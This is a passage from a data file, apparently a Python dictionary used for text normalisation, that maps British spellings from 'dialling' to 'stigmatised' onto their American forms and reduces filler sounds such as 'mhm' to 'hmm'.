'dialling': 'dialing', 'dialogue': 'dialog', 'dialogues': 'dialogs', 'diarrhoea': 'diarrhea', 'digitise': 'digitize', 'digitised': 'digitized', 'digitises': 'digitizes', 'digitising': 'digitizing', 'disc': 'disk', 'discolour': 'discolor', 'discoloured': 'discolored', 'discolouring': 'discoloring', 'discolours': 'discolors', 'discs': 'disks', 'disembowelled': 'disemboweled', 'disembowelling': 'disemboweling', 'disfavour': 'disfavor', 'dishevelled': 'disheveled', 'dishonour': 'dishonor', 'dishonourable': 'dishonorable', 'dishonourably': 'dishonorably', 'dishonoured': 'dishonored', 'dishonouring': 'dishonoring', 'dishonours': 'dishonors', 'disorganisation': 'disorganization', 'disorganised': 'disorganized', 'distil': 'distill', 'distils': 'distills', 'dramatisation': 'dramatization', 'dramatisations': 'dramatizations', 'dramatise': 'dramatize', 'dramatised': 'dramatized', 'dramatises': 'dramatizes', 'dramatising': 'dramatizing', 'draught': 'draft', 'draughtboard': 'draftboard', 'draughtboards': 'draftboards', 'draughtier': 'draftier', 'draughtiest': 'draftiest', 'draughts': 'drafts', 'draughtsman': 'draftsman', 'draughtsmanship': 'draftsmanship', 'draughtsmen': 'draftsmen', 'draughtswoman': 'draftswoman', 'draughtswomen': 'draftswomen', 'draughty': 'drafty', 'drivelled': 'driveled', 'drivelling': 'driveling', 'duelled': 'dueled', 'duelling': 'dueling', 'economise': 'economize', 'economised': 'economized', 'economises': 'economizes', 'economising': 'economizing', 'editorialise': 'editorialize', 'editorialised': 'editorialized', 'editorialises': 'editorializes', 'editorialising': 'editorializing', 'edoema': 'edema', 'empathise': 'empathize', 'empathised': 'empathized', 'empathises': 'empathizes', 'empathising': 'empathizing', 'emphasise': 'emphasize', 'emphasised': 'emphasized', 'emphasises': 'emphasizes', 'emphasising': 'emphasizing', 'enamelled': 'enameled', 'enamelling': 'enameling', 'enamoured': 'enamored', 'encyclopaedia': 'encyclopedia', 'encyclopaedias': 'encyclopedias', 'encyclopaedic': 'encyclopedic', 'endeavour': 'endeavor', 'endeavoured': 'endeavored', 'endeavouring': 'endeavoring', 'endeavours': 'endeavors', 'energise': 'energize', 'energised': 'energized', 'energises': 'energizes', 'energising': 'energizing', 'enrol': 'enroll', 'enrols': 'enrolls', 'enthral': 'enthrall', 'enthrals': 'enthralls', 'epaulette': 'epaulet', 'epaulettes': 'epaulets', 'epicentre': 'epicenter', 'epicentres': 'epicenters', 'epilogue': 'epilog', 'epilogues': 'epilogs', 'epitomise': 'epitomize', 'epitomised': 'epitomized', 'epitomises': 'epitomizes', 'epitomising': 'epitomizing', 'equalisation': 'equalization', 'equalise': 'equalize', 'equalised': 'equalized', 'equaliser': 'equalizer', 'equalisers': 'equalizers', 'equalises': 'equalizes', 'equalising': 'equalizing', 'eulogise': 'eulogize', 'eulogised': 'eulogized', 'eulogises': 'eulogizes', 'eulogising': 'eulogizing', 'evangelise': 'evangelize', 'evangelised': 'evangelized', 'evangelises': 'evangelizes', 'evangelising': 'evangelizing', 'exorcise': 'exorcize', 'exorcised': 'exorcized', 'exorcises': 'exorcizes', 'exorcising': 'exorcizing', 'extemporisation': 'extemporization', 'extemporise': 'extemporize', 'extemporised': 'extemporized', 'extemporises': 'extemporizes', 'extemporising': 'extemporizing', 'externalisation': 'externalization', 'externalisations': 'externalizations', 'externalise': 'externalize', 'externalised': 'externalized', 'externalises': 'externalizes', 'externalising': 'externalizing', 'factorise': 'factorize', 'factorised': 'factorized', 'factorises': 'factorizes', 'factorising': 'factorizing', 'faecal': 'fecal', 'faeces': 'feces', 'familiarisation': 'familiarization', 'familiarise': 'familiarize', 'familiarised': 'familiarized', 'familiarises': 'familiarizes', 'familiarising': 'familiarizing', 'fantasise': 'fantasize', 'fantasised': 'fantasized', 'fantasises': 'fantasizes', 'fantasising': 'fantasizing', 'favour': 'favor', 'favourable': 'favorable', 'favourably': 'favorably', 'favoured': 'favored', 'favouring': 'favoring', 'favourite': 'favorite', 'favourites': 'favorites', 'favouritism': 'favoritism', 'favours': 'favors', 'feminise': 'feminize', 'feminised': 'feminized', 'feminises': 'feminizes', 'feminising': 'feminizing', 'fertilisation': 'fertilization', 'fertilise': 'fertilize', 'fertilised': 'fertilized', 'fertiliser': 'fertilizer', 'fertilisers': 'fertilizers', 'fertilises': 'fertilizes', 'fertilising': 'fertilizing', 'fervour': 'fervor', 'fibre': 'fiber', 'fibreglass': 'fiberglass', 'fibres': 'fibers', 'fictionalisation': 'fictionalization', 'fictionalisations': 'fictionalizations', 'fictionalise': 'fictionalize', 'fictionalised': 'fictionalized', 'fictionalises': 'fictionalizes', 'fictionalising': 'fictionalizing', 'fillet': 'filet', 'filleted': 'fileted', 'filleting': 'fileting', 'fillets': 'filets', 'finalisation': 'finalization', 'finalise': 'finalize', 'finalised': 'finalized', 'finalises': 'finalizes', 'finalising': 'finalizing', 'flautist': 'flutist', 'flautists': 'flutists', 'flavour': 'flavor', 'flavoured': 'flavored', 'flavouring': 'flavoring', 'flavourings': 'flavorings', 'flavourless': 'flavorless', 'flavours': 'flavors', 'flavoursome': 'flavorsome', 'flyer / flier': 'flier / flyer', 'foetal': 'fetal', 'foetid': 'fetid', 'foetus': 'fetus', 'foetuses': 'fetuses', 'formalisation': 'formalization', 'formalise': 'formalize', 'formalised': 'formalized', 'formalises': 'formalizes', 'formalising': 'formalizing', 'fossilisation': 'fossilization', 'fossilise': 'fossilize', 'fossilised': 'fossilized', 'fossilises': 'fossilizes', 'fossilising': 'fossilizing', 'fraternisation': 'fraternization', 'fraternise': 'fraternize', 'fraternised': 'fraternized', 'fraternises': 'fraternizes', 'fraternising': 'fraternizing', 'fulfil': 'fulfill', 'fulfilment': 'fulfillment', 'fulfils': 'fulfills', 'funnelled': 'funneled', 'funnelling': 'funneling', 'gage': 'gauge', 'gaged': 'gauged', 'gages': 'gauges', 'gaging': 'gauging', 'galvanise': 'galvanize', 'galvanised': 'galvanized', 'galvanises': 'galvanizes', 'galvanising': 'galvanizing', 'gambolled': 'gamboled', 'gambolling': 'gamboling', 'gaol': 'jail', 'gaolbird': 'jailbird', 'gaolbirds': 'jailbirds', 'gaolbreak': 'jailbreak', 'gaolbreaks': 'jailbreaks', 'gaoled': 'jailed', 'gaoler': 'jailer', 'gaolers': 'jailers', 'gaoling': 'jailing', 'gaols': 'jails', 'gasses': 'gases', 'generalisation': 'generalization', 'generalisations': 'generalizations', 'generalise': 'generalize', 'generalised': 'generalized', 'generalises': 'generalizes', 'generalising': 'generalizing', 'ghettoise': 'ghettoize', 'ghettoised': 'ghettoized', 'ghettoises': 'ghettoizes', 'ghettoising': 'ghettoizing', 'gipsies': 'gypsies', 'glamor': 'glamour', 'glamorise': 'glamorize', 'glamorised': 'glamorized', 'glamorises': 'glamorizes', 'glamorising': 'glamorizing', 'globalisation': 'globalization', 'globalise': 'globalize', 'globalised': 'globalized', 'globalises': 'globalizes', 'globalising': 'globalizing', 'glueing': 'gluing', 'goitre': 'goiter', 'goitres': 'goiters', 'gonorrhoea': 'gonorrhea', 'gramme': 'gram', 'grammes': 'grams', 'gravelled': 'graveled', 'grey': 'gray', 'greyed': 'grayed', 'greying': 'graying', 'greyish': 'grayish', 'greyness': 'grayness', 'greys': 'grays', 'grovelled': 'groveled', 'grovelling': 'groveling', 'groyne': 'groin', 'groynes': 'groins', 'gruelling': 'grueling', 'gruellingly': 'gruelingly', 'gryphon': 'griffin', 'gryphons': 'griffins', 'gynaecological': 'gynecological', 'gynaecologist': 'gynecologist', 'gynaecologists': 'gynecologists', 'gynaecology': 'gynecology', 'haematological': 'hematological', 'haematologist': 'hematologist', 'haematologists': 'hematologists', 'haematology': 'hematology', 'haemoglobin': 'hemoglobin', 'haemophilia': 'hemophilia', 'haemophiliac': 'hemophiliac', 'haemophiliacs': 'hemophiliacs', 'haemorrhage': 'hemorrhage', 'haemorrhaged': 'hemorrhaged', 'haemorrhages': 'hemorrhages', 'haemorrhaging': 'hemorrhaging', 'haemorrhoids': 'hemorrhoids', 'harbour': 'harbor', 'harboured': 'harbored', 'harbouring': 'harboring', 'harbours': 'harbors', 'harmonisation': 'harmonization', 'harmonise': 'harmonize', 'harmonised': 'harmonized', 'harmonises': 'harmonizes', 'harmonising': 'harmonizing', 'homoeopath': 'homeopath', 'homoeopathic': 'homeopathic', 'homoeopaths': 'homeopaths', 'homoeopathy': 'homeopathy', 'homogenise': 'homogenize', 'homogenised': 'homogenized', 'homogenises': 'homogenizes', 'homogenising': 'homogenizing', 'honour': 'honor', 'honourable': 'honorable', 'honourably': 'honorably', 'honoured': 'honored', 'honouring': 'honoring', 'honours': 'honors', 'hospitalisation': 'hospitalization', 'hospitalise': 'hospitalize', 'hospitalised': 'hospitalized', 'hospitalises': 'hospitalizes', 'hospitalising': 'hospitalizing', 'humanise': 'humanize', 'humanised': 'humanized', 'humanises': 'humanizes', 'humanising': 'humanizing', 'humour': 'humor', 'humoured': 'humored', 'humouring': 'humoring', 'humourless': 'humorless', 'humours': 'humors', 'hybridise': 'hybridize', 'hybridised': 'hybridized', 'hybridises': 'hybridizes', 'hybridising': 'hybridizing', 'hypnotise': 'hypnotize', 'hypnotised': 'hypnotized', 'hypnotises': 'hypnotizes', 'hypnotising': 'hypnotizing', 'hypothesise': 'hypothesize', 'hypothesised': 'hypothesized', 'hypothesises': 'hypothesizes', 'hypothesising': 'hypothesizing', 'idealisation': 'idealization', 'idealise': 'idealize', 'idealised': 'idealized', 'idealises': 'idealizes', 'idealising': 'idealizing', 'idolise': 'idolize', 'idolised': 'idolized', 'idolises': 'idolizes', 'idolising': 'idolizing', 'immobilisation': 'immobilization', 'immobilise': 'immobilize', 'immobilised': 'immobilized', 'immobiliser': 'immobilizer', 'immobilisers': 'immobilizers', 'immobilises': 'immobilizes', 'immobilising': 'immobilizing', 'immortalise': 'immortalize', 'immortalised': 'immortalized', 'immortalises': 'immortalizes', 'immortalising': 'immortalizing', 'immunisation': 'immunization', 'immunise': 'immunize', 'immunised': 'immunized', 'immunises': 'immunizes', 'immunising': 'immunizing', 'impanelled': 'impaneled', 'impanelling': 'impaneling', 'imperilled': 'imperiled', 'imperilling': 'imperiling', 'individualise': 'individualize', 'individualised': 'individualized', 'individualises': 'individualizes', 'individualising': 'individualizing', 'industrialise': 'industrialize', 'industrialised': 'industrialized', 'industrialises': 'industrializes', 'industrialising': 'industrializing', 'inflexion': 'inflection', 'inflexions': 'inflections', 'initialise': 'initialize', 'initialised': 'initialized', 'initialises': 'initializes', 'initialising': 'initializing', 'initialled': 'initialed', 'initialling': 'initialing', 'instal': 'install', 'instalment': 'installment', 'instalments': 'installments', 'instals': 'installs', 'instil': 'instill', 'instils': 'instills', 'institutionalisation': 'institutionalization', 'institutionalise': 'institutionalize', 'institutionalised': 'institutionalized', 'institutionalises': 'institutionalizes', 'institutionalising': 'institutionalizing', 'intellectualise': 'intellectualize', 'intellectualised': 'intellectualized', 'intellectualises': 'intellectualizes', 'intellectualising': 'intellectualizing', 'internalisation': 'internalization', 'internalise': 'internalize', 'internalised': 'internalized', 'internalises': 'internalizes', 'internalising': 'internalizing', 'internationalisation': 'internationalization', 'internationalise': 'internationalize', 'internationalised': 'internationalized', 'internationalises': 'internationalizes', 'internationalising': 'internationalizing', 'ionisation': 'ionization', 'ionise': 'ionize', 'ionised': 'ionized', 'ioniser': 'ionizer', 'ionisers': 'ionizers', 'ionises': 'ionizes', 'ionising': 'ionizing', 'italicise': 'italicize', 'italicised': 'italicized', 'italicises': 'italicizes', 'italicising': 'italicizing', 'itemise': 'itemize', 'itemised': 'itemized', 'itemises': 'itemizes', 'itemising': 'itemizing', 'jeopardise': 'jeopardize', 'jeopardised': 'jeopardized', 'jeopardises': 'jeopardizes', 'jeopardising': 'jeopardizing', 'jewelled': 'jeweled', 'jeweller': 'jeweler', 'jewellers': 'jewelers', 'jewellery': 'jewelry', 'judgement': 'judgment', 'kilogramme': 'kilogram', 'kilogrammes': 'kilograms', 'kilometre': 'kilometer', 'kilometres': 'kilometers', 'labelled': 'labeled', 'labelling': 'labeling', 'labour': 'labor', 'laboured': 'labored', 'labourer': 'laborer', 'labourers': 'laborers', 'labouring': 'laboring', 'labours': 'labors', 'lacklustre': 'lackluster', 'legalisation': 'legalization', 'legalise': 'legalize', 'legalised': 'legalized', 'legalises': 'legalizes', 'legalising': 'legalizing', 'legitimise': 'legitimize', 'legitimised': 'legitimized', 'legitimises': 'legitimizes', 'legitimising': 'legitimizing', 'leukaemia': 'leukemia', 'levelled': 'leveled', 'leveller': 'leveler', 'levellers': 'levelers', 'levelling': 'leveling', 'libelled': 'libeled', 'libelling': 'libeling', 'libellous': 'libelous', 'liberalisation': 'liberalization', 'liberalise': 'liberalize', 'liberalised': 'liberalized', 'liberalises': 'liberalizes', 'liberalising': 'liberalizing', 'licence': 'license', 'licenced': 'licensed', 'licences': 'licenses', 'licencing': 'licensing', 'likeable': 'likable', 'lionisation': 'lionization', 'lionise': 'lionize', 'lionised': 'lionized', 'lionises': 'lionizes', 'lionising': 'lionizing', 'liquidise': 'liquidize', 'liquidised': 'liquidized', 'liquidiser': 'liquidizer', 'liquidisers': 'liquidizers', 'liquidises': 'liquidizes', 'liquidising': 'liquidizing', 'litre': 'liter', 'litres': 'liters', 'localise': 'localize', 'localised': 'localized', 'localises': 'localizes', 'localising': 'localizing', 'louvre': 'louver', 'louvred': 'louvered', 'louvres': 'louvers', 'lustre': 'luster', 'magnetise': 'magnetize', 'magnetised': 'magnetized', 'magnetises': 'magnetizes', 'magnetising': 'magnetizing', 'manoeuvrability': 'maneuverability', 'manoeuvrable': 'maneuverable', 'manoeuvre': 'maneuver', 'manoeuvred': 'maneuvered', 'manoeuvres': 'maneuvers', 'manoeuvring': 'maneuvering', 'manoeuvrings': 'maneuverings', 'marginalisation': 'marginalization', 'marginalise': 'marginalize', 'marginalised': 'marginalized', 'marginalises': 'marginalizes', 'marginalising': 'marginalizing', 'marshalled': 'marshaled', 'marshalling': 'marshaling', 'marvelled': 'marveled', 'marvelling': 'marveling', 'marvellous': 'marvelous', 'marvellously': 'marvelously', 'materialisation': 'materialization', 'materialise': 'materialize', 'materialised': 'materialized', 'materialises': 'materializes', 'materialising': 'materializing', 'maximisation': 'maximization', 'maximise': 'maximize', 'maximised': 'maximized', 'maximises': 'maximizes', 'maximising': 'maximizing', 'meagre': 'meager', 'mechanisation': 'mechanization', 'mechanise': 'mechanize', 'mechanised': 'mechanized', 'mechanises': 'mechanizes', 'mechanising': 'mechanizing', 'mediaeval': 'medieval', 'memorialise': 'memorialize', 'memorialised': 'memorialized', 'memorialises': 'memorializes', 'memorialising': 'memorializing', 'memorise': 'memorize', 'memorised': 'memorized', 'memorises': 'memorizes', 'memorising': 'memorizing', 'mesmerise': 'mesmerize', 'mesmerised': 'mesmerized', 'mesmerises': 'mesmerizes', 'mesmerising': 'mesmerizing', 'metabolise': 'metabolize', 'metabolised': 'metabolized', 'metabolises': 'metabolizes', 'metabolising': 'metabolizing', 'metre': 'meter', 'metres': 'meters', 'mhm': 'hmm', 'micrometre': 'micrometer', 'micrometres': 'micrometers', 'militarise': 'militarize', 'militarised': 'militarized', 'militarises': 'militarizes', 'militarising': 'militarizing', 'milligramme': 'milligram', 'milligrammes': 'milligrams', 'millilitre': 'milliliter', 'millilitres': 'milliliters', 'millimetre': 'millimeter', 'millimetres': 'millimeters', 'miniaturisation': 'miniaturization', 'miniaturise': 'miniaturize', 'miniaturised': 'miniaturized', 'miniaturises': 'miniaturizes', 'miniaturising': 'miniaturizing', 'minibusses': 'minibuses', 'minimise': 'minimize', 'minimised': 'minimized', 'minimises': 'minimizes', 'minimising': 'minimizing', 'misbehaviour': 'misbehavior', 'misdemeanour': 'misdemeanor', 'misdemeanours': 'misdemeanors', 'misspelt': 'misspelled', 'mitre': 'miter', 'mitres': 'miters', 'mm': 'hmm', 'mmm': 'hmm', 'mobilisation': 'mobilization', 'mobilise': 'mobilize', 'mobilised': 'mobilized', 'mobilises': 'mobilizes', 'mobilising': 'mobilizing', 'modelled': 'modeled', 'modeller': 'modeler', 'modellers': 'modelers', 'modelling': 'modeling', 'modernise': 'modernize', 'modernised': 'modernized', 'modernises': 'modernizes', 'modernising': 'modernizing', 'moisturise': 'moisturize', 'moisturised': 'moisturized', 'moisturiser': 'moisturizer', 'moisturisers': 'moisturizers', 'moisturises': 'moisturizes', 'moisturising': 'moisturizing', 'monologue': 'monolog', 'monologues': 'monologs', 'monopolisation': 'monopolization', 'monopolise': 'monopolize', 'monopolised': 'monopolized', 'monopolises': 'monopolizes', 'monopolising': 'monopolizing', 'moralise': 'moralize', 'moralised': 'moralized', 'moralises': 'moralizes', 'moralising': 'moralizing', 'motorised': 'motorized', 'mould': 'mold', 'moulded': 'molded', 'moulder': 'molder', 'mouldered': 'moldered', 'mouldering': 'moldering', 'moulders': 'molders', 'mouldier': 'moldier', 'mouldiest': 'moldiest', 'moulding': 'molding', 'mouldings': 'moldings', 'moulds': 'molds', 'mouldy': 'moldy', 'moult': 'molt', 'moulted': 'molted', 'moulting': 'molting', 'moults': 'molts', 'moustache': 'mustache', 'moustached': 'mustached', 'moustaches': 'mustaches', 'moustachioed': 'mustachioed', 'multicoloured': 'multicolored', 'nationalisation': 'nationalization', 'nationalisations': 'nationalizations', 'nationalise': 'nationalize', 'nationalised': 'nationalized', 'nationalises': 'nationalizes', 'nationalising': 'nationalizing', 'naturalisation': 'naturalization', 'naturalise': 'naturalize', 'naturalised': 'naturalized', 'naturalises': 'naturalizes', 'naturalising': 'naturalizing', 'neighbour': 'neighbor', 'neighbourhood': 'neighborhood', 'neighbourhoods': 'neighborhoods', 'neighbouring': 'neighboring', 'neighbourliness': 'neighborliness', 'neighbourly': 'neighborly', 'neighbours': 'neighbors', 'neutralisation': 'neutralization', 'neutralise': 'neutralize', 'neutralised': 'neutralized', 'neutralises': 'neutralizes', 'neutralising': 'neutralizing', 'normalisation': 'normalization', 'normalise': 'normalize', 'normalised': 'normalized', 'normalises': 'normalizes', 'normalising': 'normalizing', 'odour': 'odor', 'odourless': 'odorless', 'odours': 'odors', 'oesophagus': 'esophagus', 'oesophaguses': 'esophaguses', 'oestrogen': 'estrogen', 'offence': 'offense', 'offences': 'offenses', 'omelette': 'omelet', 'omelettes': 'omelets', 'optimise': 'optimize', 'optimised': 'optimized', 'optimises': 'optimizes', 'optimising': 'optimizing', 'organisation': 'organization', 'organisational': 'organizational', 'organisations': 'organizations', 'organise': 'organize', 'organised': 'organized', 'organiser': 'organizer', 'organisers': 'organizers', 'organises': 'organizes', 'organising': 'organizing', 'orthopaedic': 'orthopedic', 'orthopaedics': 'orthopedics', 'ostracise': 'ostracize', 'ostracised': 'ostracized', 'ostracises': 'ostracizes', 'ostracising': 'ostracizing', 'outmanoeuvre': 'outmaneuver', 'outmanoeuvred': 'outmaneuvered', 'outmanoeuvres': 'outmaneuvers', 'outmanoeuvring': 'outmaneuvering', 'overemphasise': 'overemphasize', 'overemphasised': 'overemphasized', 'overemphasises': 'overemphasizes', 'overemphasising': 'overemphasizing', 'oxidisation': 'oxidization', 'oxidise': 'oxidize', 'oxidised': 'oxidized', 'oxidises': 'oxidizes', 'oxidising': 'oxidizing', 'paederast': 'pederast', 'paederasts': 'pederasts', 'paediatric': 'pediatric', 'paediatrician': 'pediatrician', 'paediatricians': 'pediatricians', 'paediatrics': 'pediatrics', 'paedophile': 'pedophile', 'paedophiles': 'pedophiles', 'paedophilia': 'pedophilia', 'palaeolithic': 'paleolithic', 'palaeontologist': 'paleontologist', 'palaeontologists': 'paleontologists', 'palaeontology': 'paleontology', 'panelled': 'paneled', 'panelling': 'paneling', 'panellist': 'panelist', 'panellists': 'panelists', 'paralyse': 'paralyze', 'paralysed': 'paralyzed', 'paralyses': 'paralyzes', 'paralysing': 'paralyzing', 'parcelled': 'parceled', 'parcelling': 'parceling', 'parlour': 'parlor', 'parlours': 'parlors', 'particularise': 'particularize', 'particularised': 'particularized', 'particularises': 'particularizes', 'particularising': 'particularizing', 'passivisation': 'passivization', 'passivise': 'passivize', 'passivised': 'passivized', 'passivises': 'passivizes', 'passivising': 'passivizing', 'pasteurisation': 'pasteurization', 'pasteurise': 'pasteurize', 'pasteurised': 'pasteurized', 'pasteurises': 'pasteurizes', 'pasteurising': 'pasteurizing', 'patronise': 'patronize', 'patronised': 'patronized', 'patronises': 'patronizes', 'patronising': 'patronizing', 'patronisingly': 'patronizingly', 'pedalled': 'pedaled', 'pedalling': 'pedaling', 'pedestrianisation': 'pedestrianization', 'pedestrianise': 'pedestrianize', 'pedestrianised': 'pedestrianized', 'pedestrianises': 'pedestrianizes', 'pedestrianising': 'pedestrianizing', 'penalise': 'penalize', 'penalised': 'penalized', 'penalises': 'penalizes', 'penalising': 'penalizing', 'pencilled': 'penciled', 'pencilling': 'penciling', 'personalise': 'personalize', 'personalised': 'personalized', 'personalises': 'personalizes', 'personalising': 'personalizing', 'pharmacopoeia': 'pharmacopeia', 'pharmacopoeias': 'pharmacopeias', 'philosophise': 'philosophize', 'philosophised': 'philosophized', 'philosophises': 'philosophizes', 'philosophising': 'philosophizing', 'philtre': 'filter', 'philtres': 'filters', 'phoney': 'phony', 'plagiarise': 'plagiarize', 'plagiarised': 'plagiarized', 'plagiarises': 'plagiarizes', 'plagiarising': 'plagiarizing', 'plough': 'plow', 'ploughed': 'plowed', 'ploughing': 'plowing', 'ploughman': 'plowman', 'ploughmen': 'plowmen', 'ploughs': 'plows', 'ploughshare': 'plowshare', 'ploughshares': 'plowshares', 'polarisation': 'polarization', 'polarise': 'polarize', 'polarised': 'polarized', 'polarises': 'polarizes', 'polarising': 'polarizing', 'politicisation': 'politicization', 'politicise': 'politicize', 'politicised': 'politicized', 'politicises': 'politicizes', 'politicising': 'politicizing', 'popularisation': 'popularization', 'popularise': 'popularize', 'popularised': 'popularized', 'popularises': 'popularizes', 'popularising': 'popularizing', 'pouffe': 'pouf', 'pouffes': 'poufs', 'practise': 'practice', 'practised': 'practiced', 'practises': 'practices', 'practising': 'practicing', 'praesidium': 'presidium', 'praesidiums': 'presidiums', 'pressurisation': 'pressurization', 'pressurise': 'pressurize', 'pressurised': 'pressurized', 'pressurises': 'pressurizes', 'pressurising': 'pressurizing', 'pretence': 'pretense', 'pretences': 'pretenses', 'primaeval': 'primeval', 'prioritisation': 'prioritization', 'prioritise': 'prioritize', 'prioritised': 'prioritized', 'prioritises': 'prioritizes', 'prioritising': 'prioritizing', 'privatisation': 'privatization', 'privatisations': 'privatizations', 'privatise': 'privatize', 'privatised': 'privatized', 'privatises': 'privatizes', 'privatising': 'privatizing', 'professionalisation': 'professionalization', 'professionalise': 'professionalize', 'professionalised': 'professionalized', 'professionalises': 'professionalizes', 'professionalising': 'professionalizing', 'programme': 'program', 'programmes': 'programs', 'prologue': 'prolog', 'prologues': 'prologs', 'propagandise': 'propagandize', 'propagandised': 'propagandized', 'propagandises': 'propagandizes', 'propagandising': 'propagandizing', 'proselytise': 'proselytize', 'proselytised': 'proselytized', 'proselytiser': 'proselytizer', 'proselytisers': 'proselytizers', 'proselytises': 'proselytizes', 'proselytising': 'proselytizing', 'psychoanalyse': 'psychoanalyze', 'psychoanalysed': 'psychoanalyzed', 'psychoanalyses': 'psychoanalyzes', 'psychoanalysing': 'psychoanalyzing', 'publicise': 'publicize', 'publicised': 'publicized', 'publicises': 'publicizes', 'publicising': 'publicizing', 'pulverisation': 'pulverization', 'pulverise': 'pulverize', 'pulverised': 'pulverized', 'pulverises': 'pulverizes', 'pulverising': 'pulverizing', 'pummelled': 'pummel', 'pummelling': 'pummeled', 'pyjama': 'pajama', 'pyjamas': 'pajamas', 'pzazz': 'pizzazz', 'quarrelled': 'quarreled', 'quarrelling': 'quarreling', 'radicalise': 'radicalize', 'radicalised': 'radicalized', 'radicalises': 'radicalizes', 'radicalising': 'radicalizing', 'rancour': 'rancor', 'randomise': 'randomize', 'randomised': 'randomized', 'randomises': 'randomizes', 'randomising': 'randomizing', 'rationalisation': 'rationalization', 'rationalisations': 'rationalizations', 'rationalise': 'rationalize', 'rationalised': 'rationalized', 'rationalises': 'rationalizes', 'rationalising': 'rationalizing', 'ravelled': 'raveled', 'ravelling': 'raveling', 'realisable': 'realizable', 'realisation': 'realization', 'realisations': 'realizations', 'realise': 'realize', 'realised': 'realized', 'realises': 'realizes', 'realising': 'realizing', 'recognisable': 'recognizable', 'recognisably': 'recognizably', 'recognisance': 'recognizance', 'recognise': 'recognize', 'recognised': 'recognized', 'recognises': 'recognizes', 'recognising': 'recognizing', 'reconnoitre': 'reconnoiter', 'reconnoitred': 'reconnoitered', 'reconnoitres': 'reconnoiters', 'reconnoitring': 'reconnoitering', 'refuelled': 'refueled', 'refuelling': 'refueling', 'regularisation': 'regularization', 'regularise': 'regularize', 'regularised': 'regularized', 'regularises': 'regularizes', 'regularising': 'regularizing', 'remodelled': 'remodeled', 'remodelling': 'remodeling', 'remould': 'remold', 'remoulded': 'remolded', 'remoulding': 'remolding', 'remoulds': 'remolds', 'reorganisation': 'reorganization', 'reorganisations': 'reorganizations', 'reorganise': 'reorganize', 'reorganised': 'reorganized', 'reorganises': 'reorganizes', 'reorganising': 'reorganizing', 'revelled': 'reveled', 'reveller': 'reveler', 'revellers': 'revelers', 'revelling': 'reveling', 'revitalise': 'revitalize', 'revitalised': 'revitalized', 'revitalises': 'revitalizes', 'revitalising': 'revitalizing', 'revolutionise': 'revolutionize', 'revolutionised': 'revolutionized', 'revolutionises': 'revolutionizes', 'revolutionising': 'revolutionizing', 'rhapsodise': 'rhapsodize', 'rhapsodised': 'rhapsodized', 'rhapsodises': 'rhapsodizes', 'rhapsodising': 'rhapsodizing', 'rigour': 'rigor', 'rigours': 'rigors', 'ritualised': 'ritualized', 'rivalled': 'rivaled', 'rivalling': 'rivaling', 'romanticise': 'romanticize', 'romanticised': 'romanticized', 'romanticises': 'romanticizes', 'romanticising': 'romanticizing', 'rumour': 'rumor', 'rumoured': 'rumored', 'rumours': 'rumors', 'sabre': 'saber', 'sabres': 'sabers', 'saltpetre': 'saltpeter', 'sanitise': 'sanitize', 'sanitised': 'sanitized', 'sanitises': 'sanitizes', 'sanitising': 'sanitizing', 'satirise': 'satirize', 'satirised': 'satirized', 'satirises': 'satirizes', 'satirising': 'satirizing', 'saviour': 'savior', 'saviours': 'saviors', 'savour': 'savor', 'savoured': 'savored', 'savouries': 'savories', 'savouring': 'savoring', 'savours': 'savors', 'savoury': 'savory', 'scandalise': 'scandalize', 'scandalised': 'scandalized', 'scandalises': 'scandalizes', 'scandalising': 'scandalizing', 'sceptic': 'skeptic', 'sceptical': 'skeptical', 'sceptically': 'skeptically', 'scepticism': 'skepticism', 'sceptics': 'skeptics', 'sceptre': 'scepter', 'sceptres': 'scepters', 'scrutinise': 'scrutinize', 'scrutinised': 'scrutinized', 'scrutinises': 'scrutinizes', 'scrutinising': 'scrutinizing', 'secularisation': 'secularization', 'secularise': 'secularize', 'secularised': 'secularized', 'secularises': 'secularizes', 'secularising': 'secularizing', 'sensationalise': 'sensationalize', 'sensationalised': 'sensationalized', 'sensationalises': 'sensationalizes', 'sensationalising': 'sensationalizing', 'sensitise': 'sensitize', 'sensitised': 'sensitized', 'sensitises': 'sensitizes', 'sensitising': 'sensitizing', 'sentimentalise': 'sentimentalize', 'sentimentalised': 'sentimentalized', 'sentimentalises': 'sentimentalizes', 'sentimentalising': 'sentimentalizing', 'sepulchre': 'sepulcher', 'sepulchres': 'sepulchers', 'serialisation': 'serialization', 'serialisations': 'serializations', 'serialise': 'serialize', 'serialised': 'serialized', 'serialises': 'serializes', 'serialising': 'serializing', 'sermonise': 'sermonize', 'sermonised': 'sermonized', 'sermonises': 'sermonizes', 'sermonising': 'sermonizing', 'sheikh': 'sheik', 'shovelled': 'shoveled', 'shovelling': 'shoveling', 'shrivelled': 'shriveled', 'shrivelling': 'shriveling', 'signalise': 'signalize', 'signalised': 'signalized', 'signalises': 'signalizes', 'signalising': 'signalizing', 'signalled': 'signaled', 'signalling': 'signaling', 'smoulder': 'smolder', 'smouldered': 'smoldered', 'smouldering': 'smoldering', 'smoulders': 'smolders', 'snivelled': 'sniveled', 'snivelling': 'sniveling', 'snorkelled': 'snorkeled', 'snorkelling': 'snorkeling', 'snowplough': 'snowplow', 'snowploughs': 'snowplow', 'socialisation': 'socialization', 'socialise': 'socialize', 'socialised': 'socialized', 'socialises': 'socializes', 'socialising': 'socializing', 'sodomise': 'sodomize', 'sodomised': 'sodomized', 'sodomises': 'sodomizes', 'sodomising': 'sodomizing', 'solemnise': 'solemnize', 'solemnised': 'solemnized', 'solemnises': 'solemnizes', 'solemnising': 'solemnizing', 'sombre': 'somber', 'specialisation': 'specialization', 'specialisations': 'specializations', 'specialise': 'specialize', 'specialised': 'specialized', 'specialises': 'specializes', 'specialising': 'specializing', 'spectre': 'specter', 'spectres': 'specters', 'spiralled': 'spiraled', 'spiralling': 'spiraling', 'splendour': 'splendor', 'splendours': 'splendors', 'squirrelled': 'squirreled', 'squirrelling': 'squirreling', 'stabilisation': 'stabilization', 'stabilise': 'stabilize', 'stabilised': 'stabilized', 'stabiliser': 'stabilizer', 'stabilisers': 'stabilizers', 'stabilises': 'stabilizes', 'stabilising': 'stabilizing', 'standardisation': 'standardization', 'standardise': 'standardize', 'standardised': 'standardized', 'standardises': 'standardizes', 'standardising': 'standardizing', 'stencilled': 'stenciled', 'stencilling': 'stenciling', 'sterilisation': 'sterilization', 'sterilisations': 'sterilizations', 'sterilise': 'sterilize', 'sterilised': 'sterilized', 'steriliser': 'sterilizer', 'sterilisers': 'sterilizers', 'sterilises': 'sterilizes', 'sterilising': 'sterilizing', 'stigmatisation': 'stigmatization', 'stigmatise': 'stigmatize', 'stigmatised': 